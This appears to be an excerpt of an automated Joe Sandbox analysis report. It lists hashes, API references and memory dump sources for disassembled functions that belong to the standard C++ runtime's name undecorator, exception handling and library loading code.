• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: NameName::Name::operator+$atolswprintf_s
• String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
• API String ID: 1620834350-2441609178
• Opcode ID: 978e69f52fd8b525ec1dc55fc4fa8de3ff02ea3cd31bc90fc3d22f7cc102acd3
• Instruction ID: 4f971e481d8884696b69c3155d948e114875514c02770879156089d279b6bc61
• Opcode Fuzzy Hash: 978e69f52fd8b525ec1dc55fc4fa8de3ff02ea3cd31bc90fc3d22f7cc102acd3
• Instruction Fuzzy Hash: 10F16972E1864384FF14AB6CDAA51BC27A0BF45FC4F4501B6CF0E26AA9DE3DA545E340

Control-flow Graph

control_flow_graph: basic-block edge list for the function at 7ff8ba24ab04-7ff8ba24b029 (entry block 1379), rendered as a graph image in the original report.
APIs
Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: Name::operator+
• String ID:
• API String ID: 2943138195-0
• Opcode ID: 597465e820db99d0557f48292ed4c843d9516f5f232f55aca89ea12ae8ab2ee3
• Instruction ID: fa70cd1b32c7d1002c80036379f3334edc83326b4d105394e50b9c566165f011
• Opcode Fuzzy Hash: 597465e820db99d0557f48292ed4c843d9516f5f232f55aca89ea12ae8ab2ee3
• Instruction Fuzzy Hash: 43F15876E08A829AF710DF69D4901FC37B1BB04B8CB4440B6EF4D57A9ADE38E559E340

Control-flow Graph

control_flow_graph: basic-block edge list for the function at 7ff8ba242ef4-7ff8ba2433bf (entry block 1515), rendered as a graph image in the original report; the edge list includes calls to abort and terminate.
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 4223619315-393685449
• Opcode ID: 0dd560a2d9878c2caa53d7c48a3ed421d9e0544cc688ae93cdb3f87085547c5f
• Instruction ID: c1bb57526880a488f773ce680cccf01ecb56fef61922ca5beecb05831e8e7c53
• Opcode Fuzzy Hash: 0dd560a2d9878c2caa53d7c48a3ed421d9e0544cc688ae93cdb3f87085547c5f
• Instruction Fuzzy Hash: B8E16D72A08B828AEB20DB69D5802AD7BA4FB45FD8F105175EF8D57B95CF38E580D700

Control-flow Graph

control_flow_graph: basic-block edge list for the function at 7ff8ba24e600-7ff8ba24e8df (entry block 1629), rendered as a graph image in the original report; the edge list includes a call to atol.
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: Replicator::operator[]
• String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
• API String ID: 3676697650-3207858774
• Opcode ID: 3addcfa3c2c44c7a3f9a88e2e8e586db211cac7a5ef4b6226af3b5348051e299
• Instruction ID: 055b460e7fcd57165c312d93f5452710bc8bcb2b7c02a7eef89cd34b71722e5d
• Opcode Fuzzy Hash: 3addcfa3c2c44c7a3f9a88e2e8e586db211cac7a5ef4b6226af3b5348051e299
• Instruction Fuzzy Hash: 06916932A18A8799FB109F28D4502F837A1BB54B88F4841B2EF4D037A5DF3DE645E740

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: Name::operator+
• String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
• API String ID: 2943138195-1464470183
• Opcode ID: 0685ddb5f94d40678beb19f80be6ba5b9ae8127527adf2a293c082c5157d57b7
• Instruction ID: b3196f2f8ef958cb099c94a9507f016fe4ae133359d3a78404b22601403057ba
• Opcode Fuzzy Hash: 0685ddb5f94d40678beb19f80be6ba5b9ae8127527adf2a293c082c5157d57b7
• Instruction Fuzzy Hash: 5C513872F18A5299FB14CBA9E9445BC27B0BB04BC8F5001B9EF0D66A98DF39E545E700

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                            • Opcode ID: 5abc505851f038650be8a12eed447ae112168e61361c1100e042e09226019bff
                                                                                                                                                            • Instruction ID: c2a8c7a01db958e025023d2f66261c556ef82050e2dfa32ea2979bcb67e904f5
                                                                                                                                                            • Opcode Fuzzy Hash: 5abc505851f038650be8a12eed447ae112168e61361c1100e042e09226019bff
                                                                                                                                                            • Instruction Fuzzy Hash: 19614A62F24B6698FB00DBA8D8801EC37B2BB44B88F404476DF1D6BA99DF78D549D340

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 211107550-393685449
                                                                                                                                                            • Opcode ID: 9902ac396f5f1e5eb65265053c18698760bdb2f4646f61022d4b25bef39caf63
                                                                                                                                                            • Instruction ID: 07e0f0c92d730462831ae6419509e0045d779639700aceb6e0d6d5bb24d2ed1c
                                                                                                                                                            • Opcode Fuzzy Hash: 9902ac396f5f1e5eb65265053c18698760bdb2f4646f61022d4b25bef39caf63
                                                                                                                                                            • Instruction Fuzzy Hash: 51E17C72A08B828AEB20DF39D4842AD7BA0FB44F98F154175DF8D57696CF38E485DB00

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                            • API String ID: 2943138195-2239912363
                                                                                                                                                            • Opcode ID: 1305b515cbaf95635a7cfc0865d0e29a814da15fe6187979d92cf9153ab28c6a
                                                                                                                                                            • Instruction ID: 88b040648e52d92552ee669a9676d38bc7adb5cdf149ddaf27e22bab5a1483fa
                                                                                                                                                            • Opcode Fuzzy Hash: 1305b515cbaf95635a7cfc0865d0e29a814da15fe6187979d92cf9153ab28c6a
                                                                                                                                                            • Instruction Fuzzy Hash: 09512662E18B9698FB11CBA8E8412BC37B0BF48B88F4441B6DF4D12B95DF7CA544E750

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                                                                                                                            • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                                                                                            • API String ID: 1852475696-928371585
                                                                                                                                                            • Opcode ID: 0c6297dfb5abee440ad437556e5c1f31f5a21848ecbcfced78d5801869866bd6
                                                                                                                                                            • Instruction ID: 1efa75ecc9677ec896e663afa17c3c8d904c8dcbbb9e10b6b12da145843a07ff
                                                                                                                                                            • Opcode Fuzzy Hash: 0c6297dfb5abee440ad437556e5c1f31f5a21848ecbcfced78d5801869866bd6
                                                                                                                                                            • Instruction Fuzzy Hash: BA51A162B18A8792EE20DB58E5916B96360FF44FC4F404172DF9E43B69DE3CE545D300

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BA246CBB,?,?,00000000,00007FF8BA246AEC,?,?,?,?,00007FF8BA246825), ref: 00007FF8BA246B81
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF8BA246CBB,?,?,00000000,00007FF8BA246AEC,?,?,?,?,00007FF8BA246825), ref: 00007FF8BA246B8F
                                                                                                                                                            • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8BA246CBB,?,?,00000000,00007FF8BA246AEC,?,?,?,?,00007FF8BA246825), ref: 00007FF8BA246BA8
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BA246CBB,?,?,00000000,00007FF8BA246AEC,?,?,?,?,00007FF8BA246825), ref: 00007FF8BA246BBA
                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF8BA246CBB,?,?,00000000,00007FF8BA246AEC,?,?,?,?,00007FF8BA246825), ref: 00007FF8BA246C00
                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF8BA246CBB,?,?,00000000,00007FF8BA246AEC,?,?,?,?,00007FF8BA246825), ref: 00007FF8BA246C0C
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                            • API String ID: 916704608-2084034818
                                                                                                                                                            • Opcode ID: 74c15477062b03c3fd625d17cda8a56baa85639a6f0d3bccb62915ee2d38ddba
                                                                                                                                                            • Instruction ID: 2e70e789ab20fbb3f61260111cca182bd23c3ca3ec558af560c3345d142b5795
                                                                                                                                                            • Opcode Fuzzy Hash: 74c15477062b03c3fd625d17cda8a56baa85639a6f0d3bccb62915ee2d38ddba
                                                                                                                                                            • Instruction Fuzzy Hash: 3731CB21B0EA4292EE15AB0AE9005B97794FF08FE0F1945B5EF2D1A790EF3CE145A300

                                                                                                                                                            Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: abort$AdjustPointer
• String ID:
• API String ID: 1501936508-0
• Opcode ID: 4262ea040b79b22edfa10952e5ae927a693a25cf4043396a56cb8bfdb1d73783
• Instruction ID: b251af26f86ee45d6a6d26dfea6e1986d56e79d7a466ab8f2afc31acabff193a
• Opcode Fuzzy Hash: 4262ea040b79b22edfa10952e5ae927a693a25cf4043396a56cb8bfdb1d73783
• Instruction Fuzzy Hash: 11518E22A0EB5381EA79DF1A95446386796AF44FC4F0A84B6CF4D4A785DF2CE842E300

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
APIs
Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: abort$AdjustPointer
• String ID:
• API String ID: 1501936508-0
• Opcode ID: b88db04e0c6b6a7fd0ecd5e4de718b47766377f5fcd0859342ed9c2ffefca775
• Instruction ID: 2a24ca57de4a4ff907ad23c2b8fc3364a400906c724aaa18f252b7a062b9aa66
• Opcode Fuzzy Hash: b88db04e0c6b6a7fd0ecd5e4de718b47766377f5fcd0859342ed9c2ffefca775
• Instruction Fuzzy Hash: 44519E32E0AA4381FA69DB1A964463C6794BF44FC4F1A84B5DF4D06794DF2CE842E321
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: Name::operator+
• String ID: {for
• API String ID: 2943138195-864106941
• Opcode ID: f54b40f3845f759ae055109a07e21250937708c10ed7f6c75c375f6a51192cfd
• Instruction ID: 212441e60f21f14374d3238dda0b97045a4664b9465a5716e1b6682cd0619dd0
• Opcode Fuzzy Hash: f54b40f3845f759ae055109a07e21250937708c10ed7f6c75c375f6a51192cfd
• Instruction Fuzzy Hash: 5D511772A18A86A9F7019F28D5813E837A1FB44B88F4480B1EF5C4BB95EF7CE654D350
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: NameName::atol
• String ID: `template-parameter$void
• API String ID: 2130343216-4057429177
• Opcode ID: eb6e1e0d726b16e91ba7a5794e9a5fada6147386991bef4a5f72c05a3b662ee7
• Instruction ID: ce0683d092ea3ace3c3ef5d530e4da8f2ea19a6952127f7406c093b24200d651
• Opcode Fuzzy Hash: eb6e1e0d726b16e91ba7a5794e9a5fada6147386991bef4a5f72c05a3b662ee7
• Instruction Fuzzy Hash: 78415722F18B5698FB008BA8D8512FC23B1BF48BC8F9441B5DF4C26A59DF78A545E340
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: Name::operator+
• String ID: char $int $long $short $unsigned
• API String ID: 2943138195-3894466517
• Opcode ID: 61698b5b585472a95ae83896f89510239d489cb6366951c20d728b8c69cd34b2
• Instruction ID: 70454e45dd7c60d83bb892c9136b1355d47f4ccb34bcdf7c38deab24451f31c6
• Opcode Fuzzy Hash: 61698b5b585472a95ae83896f89510239d489cb6366951c20d728b8c69cd34b2
• Instruction Fuzzy Hash: BD412572E18A5689FB118F6DD8541BC2BB1BB08B88F4480B5DF4C17B98DE3DE544E740
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: Name::operator+Replicator::operator[]
• String ID: ,...$,<ellipsis>$...$<ellipsis>$void
• API String ID: 1405650943-2211150622
• Opcode ID: aca1add002127f4cf3efdf703c71b4ab8f36cea5945326d46f333e640b62e85b
• Instruction ID: 40c244cc84e2bf5ed509557585fb0ac3a614d0255f04825c96e12f4f5728e4bf
• Opcode Fuzzy Hash: aca1add002127f4cf3efdf703c71b4ab8f36cea5945326d46f333e640b62e85b
• Instruction Fuzzy Hash: 13414AB2E28B8698F7018B6CD9402BC37B0BB08B88F5845B1CF4C22794EF7DA544E701
APIs
Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
• String ID:
• API String ID: 3741236498-0
• Opcode ID: a3a9ac9155885910c006026ec84d302a3fb3bbca8a327efe49f498bca1ce9a58
• Instruction ID: 9fb8692a660c2afc897510778c15629dfa6c30e92980ec4b299e639b9fd4b539
• Opcode Fuzzy Hash: a3a9ac9155885910c006026ec84d302a3fb3bbca8a327efe49f498bca1ce9a58
• Instruction Fuzzy Hash: F831D322B19B5680EF15DF2AA90456933A4FF08FD4B5946B5DF2D03384EE3DE442D300

Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: abort$CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 2889003569-2084237596
• Opcode ID: 94e1413139c6bbba30b8ad66f06ae2a05db38382e14bd46658f429fe585231f0
• Instruction ID: 7e0b6c5b8bf751816f4ce8623cf33d80bb092088be49218f6335ae37c156b7e9
• Opcode Fuzzy Hash: 94e1413139c6bbba30b8ad66f06ae2a05db38382e14bd46658f429fe585231f0
• Instruction Fuzzy Hash: 4E919073A08B828AE710CB69E4802AD7BA1FB44BC8F104169EF8D57B58DF3CD195DB00

Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: Name::operator+
• String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
• API String ID: 2943138195-757766384
• Opcode ID: 43b7f266c3171bbdf00817c5a63e2c7b70fa0b2a6d86be587c5b74d150470c25
• Instruction ID: 25002daf8a9ad8c9d50e8ec5897d330e989a5513791b007abfc87f47553bec23
• Opcode Fuzzy Hash: 43b7f266c3171bbdf00817c5a63e2c7b70fa0b2a6d86be587c5b74d150470c25
• Instruction Fuzzy Hash: B57156B6A08A4394EB148F2CDA510B866A5BF05BC4F8455B5DF4E42B98DF3EE160E300

Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: abort$CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 2889003569-2084237596
• Opcode ID: 1b2764a8b34a61b78cb93bf783d995c710cf9a0488163cb67a3aa6f00ec1cb9a
• Instruction ID: f0144e236a2042cac494c940e3b04c741c48e2d20f7ca2921d5a78e922ee4d33
• Opcode Fuzzy Hash: 1b2764a8b34a61b78cb93bf783d995c710cf9a0488163cb67a3aa6f00ec1cb9a
• Instruction Fuzzy Hash: 0A611633A08B868AEB14DFA9D5803AD77A0FB44B98F144265EF4D17B98CF78E195D700

Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: FileHeader
• String ID: MOC$RCC$csm$csm
• API String ID: 104395404-1441736206
• Opcode ID: b3a9615b6f4824218aa6ad8f5fddc369806036b28850a320f3657a553c48c11a
• Instruction ID: 18b9caaf3a84c080f779a9febabdf3f35910cbcc38c66f8675fa5dddee7b5cd5
• Opcode Fuzzy Hash: b3a9615b6f4824218aa6ad8f5fddc369806036b28850a320f3657a553c48c11a
• Instruction Fuzzy Hash: 9F517772A0961386EB619F29D14137D66A0FF88FD4F1440B2EF8D53789CF3CE881A641

Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
